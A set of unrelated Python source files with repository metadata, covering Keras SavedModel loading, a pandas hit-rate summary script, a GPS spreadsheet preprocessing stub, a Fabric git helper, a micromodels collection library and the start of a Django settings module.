return input_signature
else:
return None
def add_trace(self, *args, **kwargs):
"""Traces all functions with the same args and kwargs.
Args:
*args: Positional args passed to the original function.
**kwargs: Keyword args passed to the original function.
"""
kwargs = kwargs.copy()
self.tracing = True
for fn in self._functions.values():
# TODO(kathywu): Replace arguments with broader shapes defined in the
# input signature.
if self._expects_training_arg:
kwargs['training'] = False
fn.original_get_concrete_function(*args, **kwargs)
kwargs['training'] = True
fn.original_get_concrete_function(*args, **kwargs)
else:
fn.original_get_concrete_function(*args, **kwargs)
self.tracing = False
@property
def fn_input_signature(self):
"""Returns input signature for the wrapped layer call function."""
if self._expects_training_arg:
# The training arg is left as a python boolean, so the call functions
# will not have an input signature (input signatures may only describe
# tensor arguments).
return None
if None in nest.flatten(self._input_signature):
# TODO(b/134962016): If input signature cannot be partially defined.
return None
return self._input_signature
def add_function(self, python_function, name):
"""Adds a layer call function to the collection."""
self._functions[name] = fn = LayerCall(
self, python_function, name,
input_signature=self.fn_input_signature)
if (None not in nest.flatten(self._input_signature) and
self._expects_training_arg):
# Manually add traces for layers that expect a training argument and have
# a fully defined input signature.
self.add_trace(*self._input_signature)
return fn
class LayerCall(def_function.Function):
"""Function that triggers traces of other functions in the same collection."""
def __init__(self, call_collection, *args, **kwargs):
super(LayerCall, self).__init__(*args, **kwargs)
self.call_collection = call_collection
def __call__(self, *args, **kwargs):
if not self.call_collection.tracing:
self.call_collection.add_trace(*args, **kwargs)
return super(LayerCall, self).__call__(*args, **kwargs)
def get_concrete_function(self, *args, **kwargs):
if not self.call_collection.tracing:
self.call_collection.add_trace(*args, **kwargs)
return super(LayerCall, self).get_concrete_function(*args, **kwargs)
def original_get_concrete_function(self, *args, **kwargs):
return super(LayerCall, self).get_concrete_function(*args, **kwargs)
def _wrap_call_and_conditional_losses(layer):
"""Wraps call function that returns a tuple of (outputs, losses).
The losses returned are conditional on the inputs passed to the call function.
Unconditional losses (e.g. weight regularizeration) are wrapped separately.
Args:
layer: a Keras layer object
Returns:
python call function that returns outputs and conditional losses -- excludes
activity regularizer
"""
# Create function that generates both outputs and losses
layer_call = layer.call
if layer._expects_training_arg: # pylint: disable=protected-access
def call_and_return_conditional_losses(inputs, training=False):
return layer_call(inputs, training=training), layer.get_losses_for(inputs)
else:
def call_and_return_conditional_losses(inputs):
K.set_learning_phase(0)
return layer_call(inputs), layer.get_losses_for(inputs)
return call_and_return_conditional_losses
def _extract_outputs_from_fn(layer, call_and_return_conditional_losses):
"""Returns a function that returns only call function outputs."""
if isinstance(layer, RevivedLayer):
return layer.keras_api.__call__ # pylint: disable=protected-access
if layer._expects_training_arg: # pylint: disable=protected-access
def call(inputs, training=False):
return call_and_return_conditional_losses(inputs, training=training)[0]
else:
def call(inputs):
return call_and_return_conditional_losses(inputs)[0]
return call
def _append_activity_regularizer_loss(
call_fn_with_losses, activity_regularizer_fn):
"""Appends activity regularizer loss to losses returned by the wrapped fn."""
def fn(*args, **kwargs):
outputs, losses = call_fn_with_losses(*args, **kwargs)
losses.append(activity_regularizer_fn(outputs))
return outputs, losses
return fn
def _wrap_unconditional_loss(loss_fn, index):
"""Wraps callable/unconditonal loss, returning a serializable function."""
# Extract original loss function from partial function
fn = loss_fn.args[0] if isinstance(loss_fn, functools.partial) else loss_fn
if isinstance(fn, def_function.Function):
return fn
else:
return def_function.Function(
fn, 'loss_fn_{}'.format(index), input_signature=[])
def _wrap_activity_regularizer(layer):
"""Wraps the activity regularizer."""
if isinstance(layer.activity_regularizer, def_function.Function):
return layer.activity_regularizer
return def_function.Function(
layer.activity_regularizer,
'{}_activity_regularizer'.format(layer.name),
input_signature=[tensor_spec.TensorSpec(None, layer.dtype or K.floatx())])
def load_from_saved_model_v2(path, compile=True): # pylint: disable=redefined-builtin
"""Loads Keras objects from a SavedModel.
Any Keras layer or model saved to the SavedModel will be loaded back
as Keras objects. Other objects are loaded as regular trackable objects (same
as `tf.saved_model.load`).
Currently, Keras saving/loading only retains the Keras object's weights,
losses, and call function.
The loaded model can be re-compiled, but the original optimizer, compiled loss
functions, and metrics are not retained. This is temporary, and `model.save`
will soon be able to serialize compiled models.
Args:
path: Path to SavedModel.
compile: If true, compile the model after loading it.
Returns:
Object loaded from SavedModel.
"""
# TODO(kathywu): Add saving/loading of optimizer, compiled losses and metrics.
# TODO(kathywu): Add code to load from objects that contain all endpoints
model = load.load_internal(path, loader_cls=KerasObjectLoader)
if isinstance(model, RevivedModel) and compile:
# TODO(kathywu): Use compiled objects from SavedModel, instead of
# creating new objects from the training config.
if model._training_config is not None: # pylint: disable=protected-access
model.compile(**saving_utils.compile_args_from_training_config(
model._training_config)) # pylint: disable=protected-access
return model
PUBLIC_ATTRIBUTES = CommonEndpoints.all_functions.union(
CommonEndpoints.all_checkpointable_objects)
PUBLIC_ATTRIBUTES.add(_KERAS_ATTR)
class KerasObjectLoader(load.Loader):
"""Loader that recreates Keras objects."""
def __init__(self, *args, **kwargs):
super(KerasObjectLoader, self).__init__(*args, **kwargs)
self._finalize()
def _finalize(self):
# pylint: disable=protected-access
for node in self._nodes:
if isinstance(node, RevivedModel):
call_fn = node.keras_api.call_and_return_conditional_losses
if call_fn.input_signature is None:
inputs = infer_inputs_from_restored_call_function(call_fn)
else:
inputs = call_fn.input_signature[0]
if isinstance(node, RevivedSequential):
with trackable.no_automatic_dependency_tracking_scope(node):
node._layers = []
for layer in node.keras_api.layers:
node.add(layer)
if not node.inputs:
# Since this revived object is technically a subclassed model (even if
# the original model is functional/sequential), inputs should be set.
node._set_inputs(inputs)
if isinstance(node, RevivedLayer):
if hasattr(node.keras_api, 'layer_regularization_losses'):
losses = getattr(node.keras_api, 'layer_regularization_losses', [])
else:
# Some earlier SavedModels may not have layer_regularization_losses
# serialized separately. Fall back to using the regularization_losses
# list if it does not exist.
losses = node._serialized_attributes.get('regularization_losses', [])
for loss in losses:
node.add_loss(loss)
# Use wrapped activity regularizer function if the layer's activity
# regularizer wasn't created during initialization.
if node.activity_regularizer is None:
node.activity_regularizer = getattr(node.keras_api,
'activity_regularizer_fn', None)
# Now that the node object has been fully loaded and restored from the,
# checkpoint, the object no longer needs to track objects added from
# SerializedAttributes. (Note that saving a training checkpoint still
# functions correctly, because layers and variables are tracked
# separately by the Layer object.)
# TODO(kathywu): Instead of outright deleting these nodes (which would
# make restoring from a different checkpoint tricky), mark them as extra
# dependencies that are OK to overwrite.
for name in PUBLIC_ATTRIBUTES:
delete_tracking(node, name)
# pylint: enable=protected-access
def _recreate_base_user_object(self, proto):
revived_classes = {
'_tf_keras_layer': (RevivedLayer, base_layer.Layer),
'_tf_keras_network': (RevivedNetwork, network_lib.Network),
'_tf_keras_model': (RevivedModel, training_lib.Model),
'_tf_keras_sequential': (RevivedSequential, models_lib.Sequential)
}
parent_classes = revived_classes.get(proto.identifier, None)
if parent_classes is not None:
parent_classes = revived_classes[proto.identifier]
metadata = json.loads(proto.metadata)
revived_cls = type(
compat.as_str(metadata['class_name']),
parent_classes,
{'__setattr__': parent_classes[1].__setattr__})
obj = revived_cls._init_from_metadata(metadata) # pylint: disable=protected-access
return obj, revived_cls._revive_setter # pylint: disable=protected-access
return super(KerasObjectLoader, self)._recreate_base_user_object(proto)
# TODO(kathywu): Centrally define keys and functions for both serialization and
# deserialization.
class RevivedLayer(object):
"""Keras layer loaded from a SavedModel."""
@classmethod
def _init_from_metadata(cls, metadata):
"""Create revived layer from metadata stored in the SavedModel proto."""
init_args = dict(
name=metadata['name'],
trainable=metadata['trainable'])
if metadata.get('dtype') is not None:
init_args['dtype'] = metadata['dtype']
if metadata.get('batch_input_shape') is not None:
init_args['batch_input_shape'] = metadata['batch_input_shape']
revived_obj = cls(**init_args)
with trackable.no_automatic_dependency_tracking_scope(revived_obj):
# pylint:disable=protected-access
revived_obj._expects_training_arg = metadata['expects_training_arg']
if metadata.get('config') is not None:
revived_obj._config = metadata['config']
if metadata.get('input_spec') is not None:
revived_obj.input_spec = recursively_deserialize_keras_object(
metadata['input_spec'],
module_objects={'InputSpec': input_spec.InputSpec})
if metadata.get('activity_regularizer') is not None:
revived_obj.activity_regularizer = regularizers.deserialize(
metadata['activity_regularizer'])
# Store attributes revived from SerializedAttributes in a un-tracked
# dictionary. The attributes are the ones listed in CommonEndpoints or
# "keras_api" for keras-specific attributes.
revived_obj._serialized_attributes = {}
# pylint:enable=protected-access
return revived_obj
def _revive_setter(self, name, value):
"""Reattaches attributes from the SavedModel to the newly revived object."""
if name in PUBLIC_ATTRIBUTES:
if isinstance(value, trackable.Trackable):
self._track_trackable(value, name=name)
self._serialized_attributes[name] = value
else:
setattr(self, name, value)
@property
def keras_api(self):
return self._serialized_attributes[_KERAS_ATTR]
def get_config(self):
if hasattr(self, '_config'):
return self._config
else:
raise NotImplementedError
def call(self, inputs, *args, **kwargs):
"""Calls the revived layer and add conditional losses."""
call_fn = _use_wrapped_call(
self, self.keras_api.call_and_return_conditional_losses)
return call_fn(inputs, *args, **kwargs)
def recursively_deserialize_keras_object(config, module_objects=None):
"""Deserialize Keras object from a nested structure."""
if isinstance(config, dict):
if 'class_name' in config:
return deserialize_keras_object(config, module_objects=module_objects)
else:
return {key: recursively_deserialize_keras_object(config[key],
module_objects)
for key in config}
if isinstance(config, (tuple, list)):
return [recursively_deserialize_keras_object(x, module_objects)
for x in config]
else:
raise ValueError('Unable to decode config: {}'.format(config))
def infer_inputs_from_restored_call_function(fn):
"""Returns TensorSpec of inputs from a restored call function.
Args:
fn: Restored layer call function. It is assumed that the inputs are entirely
in the first argument.
Returns:
TensorSpec of call function inputs.
"""
def common_spec(x, y):
return tensor_spec.TensorSpec(defun.common_shape(x.shape, y.shape),
x.dtype, x.name)
spec = fn.concrete_functions[0].structured_input_signature[0][0]
for concrete in fn.concrete_functions[1:]:
spec2 = concrete.structured_input_signature[0][0]
spec = nest.map_structure(common_spec, spec, spec2)
return spec
class RevivedNetwork(RevivedLayer):
"""Keras network of layers loaded from a SavedModel."""
@classmethod
def _init_from_metadata(cls, metadata):
"""Create revived network from metadata stored in the SavedModel proto."""
# TODO(kathywu): Refactor logic here so that RevivedNetwork uses the
revived_obj = cls(name=metadata['name'])
with trackable.no_automatic_dependency_tracking_scope(revived_obj):
# pylint:disable=protected-access
if metadata.get('dtype') is not None:
revived_obj._dtype = metadata['dtype']
revived_obj.trainable = metadata['trainable']
revived_obj._expects_training_arg = metadata['expects_training_arg']
if metadata.get('config') is not None:
revived_obj._config = metadata['config']
if metadata.get('activity_regularizer') is not None:
revived_obj.activity_regularizer = regularizers.deserialize(
metadata['activity_regularizer'])
# Store attributes revived from SerializedAttributes in a un-tracked
# dictionary. The attributes are the ones listed in CommonEndpoints or
# "keras_api" for keras-specific attributes.
revived_obj._serialized_attributes = {}
# pylint:enable=protected-access
return revived_obj
class RevivedModel(RevivedNetwork):
"""Keras model loaded from a SavedModel."""
@classmethod
def _init_from_metadata(cls, metadata):
"""Create revived model from metadata stored in the SavedModel proto."""
revived_obj = super(RevivedModel, cls)._init_from_metadata(metadata)
with trackable.no_automatic_dependency_tracking_scope(revived_obj):
revived_obj._training_config = metadata.get('training_config') # pylint:disable=protected-access
return revived_obj
class RevivedSequential(RevivedModel):
"""Keras sequential model loaded from a SavedModel."""
@classmethod
def _init_from_metadata(cls, metadata):
"""Create revived Sequential model from SavedModel metadata."""
revived_obj = super(RevivedSequential, cls)._init_from_metadata(metadata)
return revived_obj
def call(self, *args, **kwargs):
return models_lib.Sequential.call(self, *args, **kwargs)
def save(model, filepath, overwrite, include_optimizer):
"""Saves a model as a SavedModel to the filepath.
Args:
model: Keras model instance to be saved.
filepath: String path to save the model.
overwrite: whether to overwrite the existing filepath.
include_optimizer: If True, save the model's optimizer state.
Raises:
ValueError: if the model's inputs have not been defined.
"""
# If file exists and should not be overwritten.
if not overwrite and os.path.exists(filepath):
proceed = ask_to_proceed_with_overwrite(filepath)
if not proceed:
return
if _should_skip_serialization(model):
saving_utils.raise_model_input_error(model)
if not include_optimizer:
orig_optimizer = model.optimizer
model.optimizer = None
save_lib.save(model, filepath)
if not include_optimizer:
model.optimizer = orig_optimizer
| [
"sijusamuel@gmail.com"
] | sijusamuel@gmail.com |
6a1da1441b1539fa1f410d785c92f7a42e973ae5 | 99dc3d89303c1d43fada889dd074c1ed559fb85d | /qj_info.py | d557c5bbbd01f827845ae3482903489a39c7bcfe | [] | no_license | durian/Patterns | 3c66dab6b4ca9025f021c57ecf970e329da69ff8 | 9c2a161df45b0370d2623a296b1e5e460543c9e8 | refs/heads/master | 2020-06-27T01:03:49.709062 | 2019-08-01T12:16:08 | 2019-08-01T12:16:08 | 199,805,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,364 | py | #
# -----------------------------------------------------------------------------
# Example:
# python3 qj_info.py -f allqjs_b3g1a3_mnl1_mxl1096_2010-01_fgrp2_120m_prod.csv
#
# produced with: python3 ts06hitrates.py -f 2 -m 120 -p 2010-01 -d prod (-g9)
#
# plots with:
# python3 ts06hitrates.py -f 2 -m 120 -p 2010-01 -d prod --min_qj_len 1 --max_qj_len 15 --xmin 0 --xmax 15
#
# -----------------------------------------------------------------------------
#
import re
import sys, os, pickle
import argparse
import glob
from datetime import datetime
from datetime import timedelta
#https://stackoverflow.com/questions/35066588/is-there-a-simple-way-to-increment-a-datetime-object-one-month-in-python
from dateutil.relativedelta import relativedelta
import pandas as pd
import matplotlib as mpl
mpl.use("Qt5Agg") #TkAgg crashes
import matplotlib.pyplot as plt
from matplotlib import cm
import numpy as np
import itertools
from read_data import *
from pandas.plotting import autocorrelation_plot
from statsmodels.tsa.stattools import acf
from pandas.plotting import lag_plot
import itertools
from collections import Counter
from matplotlib.dates import MonthLocator, YearLocator, DateFormatter
from scipy import stats
import calendar
cat20_colours = [
"#1f77b4", "#aec7e8", "#ff7f0e", "#ffbb78", "#2ca02c",
"#98df8a", "#d62728", "#ff9896", "#9467bd", "#c5b0d5",
"#8c564b", "#c49c94", "#e377c2", "#f7b6d2", "#7f7f7f",
"#c7c7c7", "#bcbd22", "#dbdb8d", "#17becf", "#9edae5",
#https://sashat.me/2017/01/11/list-of-20-simple-distinct-colors/
#"#e6194B", "#3cb44b", "#ffe119", "#4363d8", "#f58231",
#"#911eb4", "#42d4f4", "#f032e6", "#bfef45", "#fabebe",
"#469990", "#e6beff", "#9A6324", "#fffac8", "#800000",
"#aaffc3", "#808000", "#ffd8b1", "#000075", "#a9a9a9"
]
parser = argparse.ArgumentParser()
parser.add_argument( '-a', "--anon", action='store_true', default=False, help='Anonymous axes' )
parser.add_argument( '-f', '--fn', type=str, default=None, help='File')
parser.add_argument( '-l', '--lengths', type=str, default="14,14,30,30,90,180,180,360", help='Lengt of QJs')
args = parser.parse_args()
#filenames = glob.glob( args.fn )
#print( filenames )
#from shlex import quote
#invocation = "python3 " + ' '.join(quote(s) for s in sys.argv)
#with open( "invocation_qj_info_log.txt", "a") as f:
# f.write( invocation + "\n" )
qjs_df = pd.read_csv( args.fn, sep=";", index_col=0 )
print( qjs_df.head(1) )
good_count = qjs_df['hitrate'][qjs_df['hitrate'] < 1.0 ].count()
bad_count = qjs_df['hitrate'][qjs_df['hitrate'] >= 1.0 ].count()
marker = ""
if good_count > bad_count:
marker = "!"
print( good_count, bad_count, marker )
# Length info
lengths = [ int(x) for x in args.lengths.split(",") ]
min_l = 1
max_l = min_l
# 1 - 15 91: 50 41 !
print( " <= d < num + -" )
for length in lengths:
max_l += length
sub_df = qjs_df[ (qjs_df["days"] >= min_l) & (qjs_df["days"] < max_l) ]
good_count = sub_df['hitrate'][sub_df['hitrate'] < 1.0 ].count()
bad_count = sub_df['hitrate'][sub_df['hitrate'] >= 1.0 ].count()
marker = ""
if good_count > bad_count:
marker = "!"
print( "{:4n} -{:4n} {:4n}: {:3n} {:3n} {:.4f} {}".format(
min_l, max_l, sub_df.shape[0], good_count, bad_count, good_count/bad_count, marker)
)
min_l = max_l
| [
"noreply@github.com"
] | noreply@github.com |
e5461f784b5376bbb9033706deb5c0c881b6746f | b3724a2dbfcffe7b99ae79703bc189e4c97839c3 | /geolife_preproc.py | 18aad7daa38d98e52d23c5a345664ff3cdb00e5a | [] | no_license | atasoglou/MATLAB | 7ad07bf652b827584f87912f8613e7d37cda4204 | 5fbc4086362c1c9c2a7fa13c97aa9a0d34e2069b | refs/heads/master | 2020-04-18T03:28:42.167063 | 2017-11-14T13:11:58 | 2017-11-14T13:11:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | from openpyxl import load_workbook
import ecef
import pickle
import json
wb = load_workbook("C:\Users\sglvladi\Documents\WebSync\University of Liverpool\PhD\resources\geolife.xlsx")
gps_data = wb['Sheet1']
in_file = open("/home/sglvladi/Mini_Challenge_2/cart_table.txt","r");
i=1;
for line in in_file:
tokens = line.split(",")
taxi_id = tokens[0]
timestamp = tokens[1]
lat = tokens[2]
long = tokens[3]
gps_data["A%s"%i]=taxi_id
gps_data["B%s"%i]=timestamp
gps_data["C%s"%i]=lat
gps_data["D%s"%i]=long
| [
"sglvladi@gmail.com"
] | sglvladi@gmail.com |
e63f9b6c0744c053c48c90909cbf38b01602bcd6 | fadff32aecd82fb9a0925895b437b4c6d994f50b | /microcollections/collections.py | 74946405d62be4c5ee41479296eb1c1de8cbf2dd | [] | no_license | zbyte64/micromodels-collections | 638e6551d7c7dc9092818a65695023eaa8c51bd5 | a7e7a0715f18ade96745321892a0dbafd9e04dac | refs/heads/master | 2021-01-13T02:18:44.343841 | 2014-02-20T00:57:03 | 2014-02-20T00:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,149 | py | # -*- coding: utf-8 -*-
import micromodels
class NotSet:
pass
class CollectionQuery(object):
def __init__(self, collection, params):
self.collection = collection
self.params = params
self._cache = dict()
@property
def model(self):
return self.collection.model
@property
def data_store(self):
return self.collection.data_store
def get(self, **params):
if params:
return self.clone(**params).get()
if 'get' not in self._cache:
result = self.data_store.get(self.collection, self.params)
self._cache['get'] = \
self.data_store.load_instance(self.collection, result)
return self._cache['get']
def __iter__(self):
self._cache.setdefault('objects', dict())
if 'results' not in self._cache:
self.find()
#yield cached objects
index = 0
while index in self._cache['objects']:
yield self._cache['objects'][index]
index += 1
#yield objects not yet loaded
for index, result in self._cache['results']:
if index not in self._cache['objects']: # redundant
self._cache['objects'][index] = \
self.data_store.load_instance(self.collection, result)
yield self._cache['objects'][index]
def __getitem__(self, index):
#TODO communicate to backend so that we don't fetch more then we need
self._cache.setdefault('objects', dict())
if 'results' not in self._cache:
self.find()
if isinstance(index, slice):
def sliced_gen():
for y, obj in enumerate(iter(self)):
if y >= index.start and y < index.stop:
yield obj
return sliced_gen()
else:
if index in self._cache['objects']:
return self._cache['objects'][index]
else:
for y, obj in enumerate(iter(self)):
if y == index:
return obj
raise KeyError('Not found: %s' % index)
def __len__(self):
return self.count()
def find(self, **params):
if params:
return self.clone(**params).find()
if not self.params:
return self.all()
if 'results' not in self._cache:
results = self.data_store.find(self.collection, self.params)
self._cache['results'] = enumerate(results)
return iter(self)
def first(self, **params):
if params:
return self.clone(**params).first()
if not self.params:
return self.all().next()
if 'results' not in self._cache:
results = self.data_store.find(self.collection, self.params)
self._cache['results'] = enumerate(results)
try:
return iter(self).next()
except StopIteration:
return None
def all(self):
if self.params:
return self.find()
if 'results' not in self._cache:
results = self.data_store.all(self.collection)
self._cache['results'] = enumerate(results)
return iter(self)
def delete(self):
return self.data_store.delete(self.collection, self.params)
def count(self):
if 'count' not in self._cache:
self._cache['count'] = \
self.data_store.count(self.collection, self.params)
return self._cache['count']
def keys(self):
if 'keys' not in self._cache:
self._cache['keys'] = \
self.data_store.keys(self.collection, self.params)
return self._cache['keys']
def exists(self, **params):
if params:
return self.clone(**params).exists()
if 'exists' not in self._cache:
self._cache['exists'] = \
self.data_store.exists(self.collection, self.params)
return self._cache['exists']
def clone(self, **params):
new_params = dict(self.params)
new_params.update(params)
return type(self)(self.collection, new_params)
class CRUDHooks(object):
def modelRegistered(self, model):
return model
def afterInitialize(self, instance):
return instance
def beforeCreate(self, params):
return params
def afterCreate(self, instance):
return instance
def beforeSave(self, instance):
return instance
def afterSave(self, instance):
return instance
def beforeRemove(self, instance):
return instance
def afterRemove(self, instance):
return instance
#CONSIDER: ids or params?
def afterDelete(self):
return
class BaseCollection(CRUDHooks):
model = None
object_id_field = None
id_generator = None
params = dict()
def get_query(self, **params):
if self.params:
params.update(self.params)
return CollectionQuery(self, params)
def get_loader(self):
return self.model
def get_object_id(self, instance):
object_id = instance.get(self.object_id_field, self.id_generator)
if callable(object_id):
object_id = object_id()
return object_id
def get_serializable(self, instance):
'''
Returns an object representation that can be easily serialized
'''
return instance
## Dictionary like methods ##
def __setitem__(self, key, instance):
if self.object_id_field:
if hasattr(instance, '__setitem__'):
instance[self.object_id_field] = key
elif hasattr(instance, self.object_id_field):
setattr(instance, self.object_id_field, key)
return self.save(instance, key)
def __getitem__(self, key):
return self.get(pk=key)
def __delitem__(self, key):
return self.find(pk=key).delete()
def __contains__(self, key):
return self.exists(pk=key)
def __len__(self):
return self.count()
def keys(self):
return self.get_query().keys()
def values(self):
return self.all()
def items(self):
#TODO make efficient
for key in self.keys():
yield (key, self.get(key))
def extend(self, items):
for item in items:
self.save(item)
def update(self, items):
for key, value in items.items():
self[key] = value
def pop(self, key, default=NotSet):
try:
instance = self[key]
except (KeyError, IndexError):
if default == NotSet:
raise
return default
instance.remove()
return instance
def has_key(self, key):
return key in self
def clear(self):
self.delete()
def setdefault(self, key, value):
if key in self:
return
self[key] = value
def copy(self):
return dict(self.items())
def get(self, pk=NotSet, _default=None, **params):
'''
Returns a single object matching the query params
Raises exception if no object matches
'''
if pk is not NotSet:
params['pk'] = pk
try:
return self.get_query(**params).get()
except (KeyError, IndexError):
return _default
## Query Methods ##
def first(self, **params):
'''
Returns a single object matching the query params
Returns None if no object matches
'''
return self.get_query(**params).first()
def find(self, **params):
'''
Returns a query object that iterates over instances matching the query params
'''
return self.get_query(**params)
def exists(self, **params):
'''
Returns a boolean on whether objects match the query params
'''
return self.get_query(**params).exists()
def new(self, **params):
'''
Instantiates and returns a new instance
'''
instance = self.model(**params)
return self.afterInitialize(instance)
def create(self, **params):
'''
Saves a new instance
'''
instance = self.new(**params)
return self.save(instance)
def save(self, instance, key=None):
return self.data_store.save(self, instance, key)
def remove(self, instance):
return self.data_store.remove(self, instance)
def all(self):
return self.get_query()
def delete(self):
return self.get_query().delete()
def count(self):
return self.get_query().count()
def __iter__(self):
return self.get_query().__iter__()
class RawCollection(BaseCollection):
'''
A collection that returns dictionaries and responds like a dictionary
'''
object_id_field = 'id'
def __init__(self, data_store=None, model=dict, name=None,
object_id_field=None, id_generator=None, params=None):
if data_store is None:
from .datastores import MemoryDataStore
data_store = MemoryDataStore
if callable(data_store):
data_store = data_store
self.data_store = data_store
self.model = model
self.name = name
self.params = params or dict()
if object_id_field:
self.object_id_field = object_id_field
if id_generator:
self.id_generator = id_generator
super(RawCollection, self).__init__()
## Hooks ##
def beforeSave(self, instance):
#set the id field if we have one
if self.object_id_field:
key = self.get_object_id(instance)
if hasattr(instance, '__setitem__'):
instance[self.object_id_field] = key
else:
setattr(instance, self.object_id_field, key)
return super(RawCollection, self).beforeSave(instance)
class Collection(RawCollection):
'''
A collection bound to a schema and returns model instances
'''
def __init__(self, model, data_store=None, name=None,
object_id_field=None, id_generator=None, params=None):
if name is None:
name = model.__name__
super(Collection, self).__init__(model=model, data_store=data_store,
name=name, object_id_field=object_id_field,
id_generator=id_generator, params=params,)
def prepare_model(self, model):
'''
Legacy hook, you shouldn't modify the model, but if you do return a new
class
'''
return self.modelRegistered(model)
def get_loader(self):
'''
Returns a callable that returns an instantiated model instance
'''
if not hasattr(self, '_prepped_model'):
self._prepped_model = self.prepare_model(self.model)
return self._prepped_model
def get_object_id(self, instance):
object_id = getattr(instance, self.object_id_field, self.id_generator)
if callable(object_id):
object_id = object_id()
return object_id
def get_serializable(self, instance):
return instance.to_dict(serial=True)
def modelRegistered(self, model):
model._collection = self
if not hasattr(model, 'remove'):
def remove(instance):
return self.remove(instance)
model.remove = remove
if not hasattr(model, 'save'):
def save(instance):
return self.save(instance)
model.save = save
return super(Collection, self).modelRegistered(model)
class PolymorphicLoader(object):
'''
Returns the proper model class based on the object type field
'''
def __init__(self, poly_collection):
self.collection = poly_collection
def __call__(self, **values):
object_type = self.collection.get_object_type_from_values(values)
model = self.collection.get_model(object_type)
return model(**values)
class PolymorphicCollection(Collection):
'''
A collection representing mixed objects
'''
object_type_field = '_object_type'
object_types_field = '_object_types'
def __init__(self, model, *args, **kwargs):
self.prepped_base_model = self.prepare_model(model)
# object_type => model
self.descendent_registry = dict()
# model => (object_type, object_types)
self.reverse_descendent_registry = dict()
super(PolymorphicCollection, self).__init__(model, *args, **kwargs)
def get_loader(self):
return PolymorphicLoader(self)
def get_model(self, object_type):
if object_type not in self.descendent_registry:
self.load_model(object_type)
return self.descendent_registry.get(object_type,
self.prepped_base_model)
def load_model(self, object_type):
#import and add model here
pass
def extract_object_type(self, cls):
return '%s.%s' (cls.__module__, cls.__name__)
def register_model(self, model):
'''
Registers a new model to belong in the collection
'''
if not issubclass(model, (self.model, self.prepped_base_model)):
return
model = self.prepare_model(model)
object_type = self.extract_object_type(model)
object_types = [object_type]
def collect_parents(bases):
for entry in bases:
if isinstance(entry, tuple):
collect_parents(entry)
elif issubclass(entry, micromodels.Model):
parent_type = self.extract_object_type(entry)
if parent_type not in object_types:
object_types.append(parent_type)
collect_parents(model.__bases__)
self.descendent_registry[object_type] = model
self.reverse_descendent_registry[model] = (object_type, object_types)
def get_object_type(self, instance):
'''
Return a string representing the model instance type
'''
model = type(instance)
if model in self.reverse_descendent_registry:
return self.reverse_descendent_registry[model][0]
object_type = getattr(instance, self.object_type_field, None)
if object_type is None:
object_type = self.extract_object_type(type(instance))
if callable(object_type):
object_type = object_type()
return object_type
def get_object_types(self, instance):
'''
Return a list of strings representing the various inherritted types of
the model instance
'''
model = type(instance)
if model in self.reverse_descendent_registry:
return self.reverse_descendent_registry[model][1]
object_types = getattr(instance, self.object_types_field, None)
if callable(object_types):
object_types = object_types()
return object_types
def get_object_type_from_values(self, values):
return values.get(self.object_type_field, None)
def afterInitialize(self, instance):
object_type = self.get_object_type(instance)
if object_type:
instance.add_field(self.object_type_field, object_type,
micromodels.CharField())
else:
assert False, 'Why is object type None?'
object_types = self.get_object_types(instance)
if object_types:
assert len(set(object_types)) == len(object_types), 'Duplicate object types detected'
instance.add_field(self.object_types_field, object_types,
micromodels.FieldCollectionField(micromodels.CharField()))
else:
assert False, 'Why is object types None?'
return super(PolymorphicCollection, self).afterInitialize(instance)
def findType(self, cls, **params):
object_type = self.extract_object_type(cls)
params[self.object_types_field] = object_type
return self.find(**params)
| [
"zbyte64@gmail.com"
] | zbyte64@gmail.com |
9091a2f5ad5a8f44c3e29f97f9374e60cd235cc9 | f24ebd0ee446e95f3953dbb840526fc6d299b13d | /env/bin/mako-render | 3c7ef53c1046d6470bca23a4441bcbea53b58523 | [] | no_license | hendro15/flaskFramework | 158f8f01aeec12e26d88f1a1522a93303ff32468 | 306a5b4885fdb4549d0472eac6fbd99b7986f949 | refs/heads/master | 2020-04-08T19:11:39.063975 | 2018-11-29T11:17:21 | 2018-11-29T11:17:21 | 159,644,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/sonic/Documents/latihan/flaskPACKT/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from mako.cmd import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
| [
"hendro.prabowo15@gmail.com"
] | hendro.prabowo15@gmail.com | |
f25fea41a8eb4d8286b1e6c59fff5b38cabfa4f1 | bc49f67a1dc4cb0d9ce8b4a366ba79fb83782eda | /scripts/version_control/gitpush.py | 64cebcaa532c24958f3cd555d5393782b21f5efd | [] | no_license | kchida/dot-files | ab5a229f03474edbb7ff19159c4da559028d4349 | 884b8fbfc404df0bf994d293e1253f787550f2fd | refs/heads/master | 2022-10-21T02:18:07.206751 | 2022-08-13T19:43:15 | 2022-08-13T19:43:15 | 4,061,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | #!/usr/bin/env python
from fabric.api import local, lcd, prompt
message = prompt('Enter your commit message: ')
local('git add -A . && git commit -m "%s" && git push origin' % message)
| [
"kenchida2@gmail.com"
] | kenchida2@gmail.com |
04b5a1dc61e840f5fcda2ada41e6e4e0c4e397f5 | 66cef11807c3a0fc53bce2419865d8997d5c44ab | /software_bind/software_bind/settings.py | 3da20839ba752a4b736b3ed4ed36fa4c9d6e582c | [] | no_license | GrtSid/software_fuse | 1f7c77472449ca00b6cdeb0ac3243903649fb8df | 3f6f5a5f9d92c8593151901b7fec41ab8687dcd1 | refs/heads/master | 2021-09-23T01:08:19.730330 | 2020-02-26T18:33:16 | 2020-02-26T18:33:16 | 240,294,575 | 0 | 0 | null | 2021-09-22T18:39:06 | 2020-02-13T15:32:02 | Python | UTF-8 | Python | false | false | 3,348 | py | """
Django settings for software_bind project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
template_dir = os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
